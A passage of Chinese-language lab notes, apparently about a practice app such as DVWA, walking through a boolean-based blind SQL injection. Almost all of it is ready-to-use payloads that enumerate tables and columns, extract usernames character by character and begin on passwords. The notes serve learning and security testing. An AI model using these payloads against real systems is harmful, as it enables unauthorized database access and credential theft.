# 二、正文

## step2 猜测数据库中表的数量

1' and (select count(table_name) from information_schema.tables where table_schema=database())=1#  不存在
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2#  存在

## step3 猜测每个表的名字

### 猜测第一个表名的长度

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=1#  不存在

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=2#  不存在

…………

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)=9#  存在

### 猜测第二个表名的长度

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=1# 不存在

…………

1' and (select length(table_name) from information_schema.tables where table_schema=database() limit 1,1)=5# 存在

select * from table LIMIT 5,10; #返回第6-15行数据
select * from table LIMIT 5; #返回前5行
select * from table LIMIT 0,5; #返回前5行

limit a,b  #返回第a+1至a+b行的数据

### 猜测第一个表的表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97# 存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122# 存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>106# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103#  存在

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>97#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))<122#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>109#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>115#    存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>118# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=116# 不存在
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117#    存在

### 猜测第二个表的表名

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,2),1,1))>97#
……………………

SUBSTR(str,pos);  #从第pos个字符开始截取到末尾

SUBSTR(str,pos,len);  #从第pos个字符开始截取len个字符

## step4 猜测users表中每列的名字

### 猜测users表的字段数

1' and (select count(column_name) from information_schema.columns where table_name='users')=1#        不成功
1' and (select count(column_name) from information_schema.columns where table_name='users')=14#        成功

### 猜测users表每一列的长度

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7#成功

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1))=10#

1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 2,1),1))=1#
1' and length(substr((select column_name from information_schema.columns where table_name='users' limit 2,1),1))=9#

7,10,9,4,8,6,10,12,4,19,17,2,8,8

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>97# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))<122# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>109# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>115# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))>117# 不存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),1,1))=116# 不存在

1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),2,1))=115# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),3,1))=101# 存在
1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit 3,1),4,1))=114# 存在

1' and (select length(user) from users where user_id=1)=5#

1' and length(substr((select user from users where user_id=1),1))=5#

1' and ascii(substr((select user from users limit 0,1),1,1))=97#    a
1' and ascii(substr((select user from users limit 0,1),2,1))=100#    d
1' and ascii(substr((select user from users limit 0,1),3,1))=109#    m
1' and ascii(substr((select user from users limit 0,1),4,1))=105#    i
1' and ascii(substr((select user from users limit 0,1),5,1))=110#    n

1' and ascii(substr((select user from users limit 1,1),1,1))=103#    g
1' and ascii(substr((select user from users limit 1,1),2,1))=111#    o
1' and ascii(substr((select user from users limit 1,1),3,1))=114#    r
1' and ascii(substr((select user from users limit 1,1),4,1))=100#    d
1' and ascii(substr((select user from users limit 1,1),5,1))=111#    o
1' and ascii(substr((select user from users limit 1,1),6,1))=110#    n
1' and ascii(substr((select user from users limit 1,1),7,1))=98#    b

1' and ascii(substr((select password from users limit 0,1),1,1))>……

